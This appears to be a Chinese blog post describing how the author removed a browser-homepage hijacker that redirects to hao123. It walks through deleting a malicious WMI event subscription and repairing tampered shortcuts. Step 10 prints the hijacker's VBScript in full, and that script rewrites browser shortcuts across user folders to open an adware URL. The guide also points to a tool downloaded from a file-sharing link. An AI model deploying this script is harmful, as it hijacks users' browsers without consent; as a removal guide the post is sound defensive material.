个人很喜欢用chrome,不过,这两天打开chrome时,首页总是默认打开hao123首页,chrome设置里是空白页。后来发现浏览器打开的瞬间被一闪重启了下,然后就会出现hao123,很明显被劫持了,开始寻找解决办法。首先,修改了chrome的锁定主页,测试后完全不管用。然后,删除chrome快捷方式,找到C盘安装目录下chrome.exe,双击打开后首页正常,重新建了一个快捷方式到桌面,再次打开chrome,首页也是正常。不过,事情并没有这么简单,关机重启后,还是会被hao123劫持。于是,开始谷歌解决办法,最终用以下方法解决了劫持,特别写了此篇文章,做个笔记,供后来人参考一下。以下是解决办法: 问题描述:(1)电脑内安装的Chrome浏览器的首页都变成了 http://hao.169x.cn/或者http://hao.549x.cn/等等 ,然后跳转到 hao123; (2)发现浏览器的快捷方式中的“目标”中被追加了一串 http://hao.169x.cn/ ,手动删除这些内容后,下次开机会恢复回来; (3)尝试了网上的一些解决办法,例如禁用 Windows激活软件的服务(如 KMS 或 OEM 等),或者使用各类软件管家软件禁用了某些任务计划,然而这些服务/计划并不存在或者已经禁用了,从而导致问题仍然无法彻底解决。 1.右键点开你桌面上的浏览器快捷方式,选“属性”,看一下“目标(T):”这一栏,在浏览器地址后面是不是还跟了其它东西,像这样(这里可能是169或549等劫持,反正是不正常的):
正常情况是这样的:
2.下载并安装wmi tool 链接: https://pan.baidu.com/s/1pKWWwxd 密码: bpih 3.从开始菜单依次打开WIM Tools -> WIM Event Viewer,打开后如下图示。单击左上角按钮。
4.接下来可能出现下图所示界面。如有,点击下图中圈选的按钮,否则将直接出现 5
中界面:
5.在下图界面中单击“Connect”按钮:
6.在弹出窗后中单击“OK”按钮:
7.单击“root”前加号,展开后选中“CIMV2”,结果如图示:
8.在接下来弹出的对话框中选择“OK”:
9.进入了下图所示界面,单击__EventFilter前加号,得到如下结果:
10.双击名为上图中选中的项,单击下图所示“Script Text”行“Value”列对应的单元格并仔细浏览,能够发现hao.169x.cn的踪迹:
如果将该单元格中内容复制出来,得到如下代码: - On Error Resume Next:Const link = "http://hao169.com/?r=v&m=4":Const link360 = "http://hao169.com/?r=v&m=4&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:Users iandDesktop,C:Users iandAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:Users iandAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:Users iandAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:Users iandAppDataRoamingMicrosoftWindowsStart MenuPrograms":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
11.返回步骤 9,右击 9 中选中项,选择“Delete instance”后关闭该窗口:
12.至此,算是找到了问题的根源,但是之前已经造成的破会仍需要手动修复,也就是需要手动修复被篡改的浏览器快捷方式。各种浏览器的修复方式相同,在此以Internet Explorer的修复为例,修复其他浏览器也是通过修改快捷方式的办法实现。
从开始菜单找到Internet Explorer,右击该快捷方式,在“快捷方式”选项卡的“目标”一行中删除(如果有)http://hao.169x.cn开头的一串文字,如下图所示。然后“确定”。
13.最后,用杀毒软件进行全盘扫描(国产的比较流氓,大家注意下!),以实现彻底清除木马病毒的目的。
|